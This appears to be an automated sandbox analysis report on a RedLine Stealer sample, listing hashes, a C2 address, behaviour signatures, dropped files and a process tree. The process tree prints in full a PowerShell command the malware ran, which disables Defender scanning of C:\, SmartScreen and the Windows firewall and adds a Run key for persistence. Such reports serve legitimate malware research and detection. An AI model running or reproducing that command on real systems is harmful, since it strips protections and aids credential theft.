Analysis

  • max time kernel
    145s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    26-09-2021 22:37

General

  • Target

    96c2ef023febbd4e3773bbb3a59e54c3.exe

  • Size

    417KB

  • MD5

    96c2ef023febbd4e3773bbb3a59e54c3

  • SHA1

    8e20dc3097d3380f1b2c567a05b3a7d8dae713bf

  • SHA256

    770e6bbe4c4f4e7abfbb4a533d28f8e44c5a374aa05dc3c333d7f15594e217e7

  • SHA512

    f5e45c4c6f09c1d1d40832b1611fbff8ba822964cdb40e397254ae143a44f8c822ca7b5dcbdd7a3ddbd5f1b383fd7c1db2233ac9301fbc58f3c75f280abb9370

Malware Config

Extracted

Family

redline

Botnet

7W06ZPHY

C2

188.34.176.164:80

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
    "C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1612
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1436
    • C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
      C:\Users\Admin\AppData\Local\Temp\96c2ef023febbd4e3773bbb3a59e54c3.exe
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Users\Admin\AppData\Local\Temp\rcn.exe
        "C:\Users\Admin\AppData\Local\Temp\rcn.exe"
        3⤵
        • Executes dropped EXE
        • Drops startup file
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
          4⤵
          • Modifies security service
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1840
          • C:\ProgramData\UpSys.exe
            "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1728
            • C:\ProgramData\UpSys.exe
              "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1628
              • C:\ProgramData\UpSys.exe
                "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                7⤵
                • Executes dropped EXE
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:1220
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  8⤵
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1252
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            5⤵
              PID:1240
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 1636 -s 1680
            4⤵
            • Loads dropped DLL
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1316
    • C:\Windows\system32\makecab.exe
      "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210926223821.log C:\Windows\Logs\CBS\CbsPersist_20210926223821.cab
      1⤵
      • Drops file in Windows directory
      PID:956

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\UpSys.exe

      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe

      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe

      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\ProgramData\UpSys.exe

      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • C:\Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • C:\Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      MD5

      5f8ceceefb3451642734c4b32a16460b

      SHA1

      a868adfbb5c8c61ad730783968e3bc5298360a88

      SHA256

      1927e2d7fab8062194f1f40e9cd36a3ab638696673b4d6d4fa9dedb565cfb46c

      SHA512

      2c0ef4811a5509599b6f27295f4fa3915e17db0e500e9829e9befd2dd75342b82ef10214f195246e3617847517baea8b3bc371b35e8e104e47619e730f03cf73

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \ProgramData\MicrosoftNetwork\System.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \ProgramData\UpSys.exe

      MD5

      efe5769e37ba37cf4607cb9918639932

      SHA1

      f24ca204af2237a714e8b41d54043da7bbe5393b

      SHA256

      5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

      SHA512

      33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • \Users\Admin\AppData\Local\Temp\rcn.exe

      MD5

      cfadb3a07eb0470aeeec9fa3dbb3ad67

      SHA1

      37d6410c23e9ca02bc7ed3c75743b3295dd19712

      SHA256

      1fa432e601026a3a0f2b2b86f95365991af5b8dcb3233369c5f7828409e5ed56

      SHA512

      713804a6dc24e0f64d814a043d682b8455685a818fad2cc875b768ad84287450da2d1373664ea69dced75689605cbf61dccbc2247709afdfb0ffa49a6961498a

    • memory/1116-53-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

      Filesize

      4KB

    • memory/1116-67-0x0000000004930000-0x0000000004931000-memory.dmp

      Filesize

      4KB

    • memory/1116-64-0x0000000004160000-0x0000000004179000-memory.dmp

      Filesize

      100KB

    • memory/1116-63-0x00000000040D0000-0x0000000004102000-memory.dmp

      Filesize

      200KB

    • memory/1240-105-0x0000000000000000-mapping.dmp

    • memory/1252-115-0x0000000001C80000-0x0000000001C82000-memory.dmp

      Filesize

      8KB

    • memory/1252-118-0x0000000001C8B000-0x0000000001CAA000-memory.dmp

      Filesize

      124KB

    • memory/1252-114-0x000007FEF2040000-0x000007FEF2B9D000-memory.dmp

      Filesize

      11.4MB

    • memory/1252-116-0x0000000001C82000-0x0000000001C84000-memory.dmp

      Filesize

      8KB

    • memory/1252-117-0x0000000001C84000-0x0000000001C87000-memory.dmp

      Filesize

      12KB

    • memory/1252-112-0x0000000000000000-mapping.dmp

    • memory/1316-106-0x0000000001BC0000-0x0000000001BC1000-memory.dmp

      Filesize

      4KB

    • memory/1316-91-0x0000000000000000-mapping.dmp

    • memory/1436-60-0x0000000000000000-mapping.dmp

    • memory/1612-55-0x0000000000000000-mapping.dmp

    • memory/1612-56-0x0000000075BF1000-0x0000000075BF3000-memory.dmp

      Filesize

      8KB

    • memory/1612-58-0x00000000022B0000-0x0000000002EFA000-memory.dmp

      Filesize

      12.3MB

    • memory/1612-57-0x00000000022B0000-0x0000000002EFA000-memory.dmp

      Filesize

      12.3MB

    • memory/1612-59-0x00000000022B0000-0x0000000002EFA000-memory.dmp

      Filesize

      12.3MB

    • memory/1636-78-0x0000000077210000-0x0000000077212000-memory.dmp

      Filesize

      8KB

    • memory/1636-72-0x0000000000000000-mapping.dmp

    • memory/1636-76-0x0000000077060280-0x0000000077061280-memory.dmp

      Filesize

      4KB

    • memory/1636-77-0x000000013FCF0000-0x00000001407AD000-memory.dmp

      Filesize

      10.7MB

    • memory/1636-81-0x00000000771E0000-0x00000000771E2000-memory.dmp

      Filesize

      8KB

    • memory/1636-80-0x00000000771C0000-0x00000000771C2000-memory.dmp

      Filesize

      8KB

    • memory/1636-79-0x0000000077200000-0x0000000077202000-memory.dmp

      Filesize

      8KB

    • memory/1680-68-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1680-70-0x0000000004300000-0x0000000004301000-memory.dmp

      Filesize

      4KB

    • memory/1680-65-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1680-66-0x000000000041C5D6-mapping.dmp

    • memory/1728-102-0x0000000000000000-mapping.dmp

    • memory/1840-87-0x0000000002590000-0x0000000002592000-memory.dmp

      Filesize

      8KB

    • memory/1840-88-0x0000000002592000-0x0000000002594000-memory.dmp

      Filesize

      8KB

    • memory/1840-90-0x0000000002594000-0x0000000002597000-memory.dmp

      Filesize

      12KB

    • memory/1840-89-0x000000000259B000-0x00000000025BA000-memory.dmp

      Filesize

      124KB

    • memory/1840-85-0x000007FEF2040000-0x000007FEF2B9D000-memory.dmp

      Filesize

      11.4MB

    • memory/1840-83-0x000007FEFB891000-0x000007FEFB893000-memory.dmp

      Filesize

      8KB

    • memory/1840-82-0x0000000000000000-mapping.dmp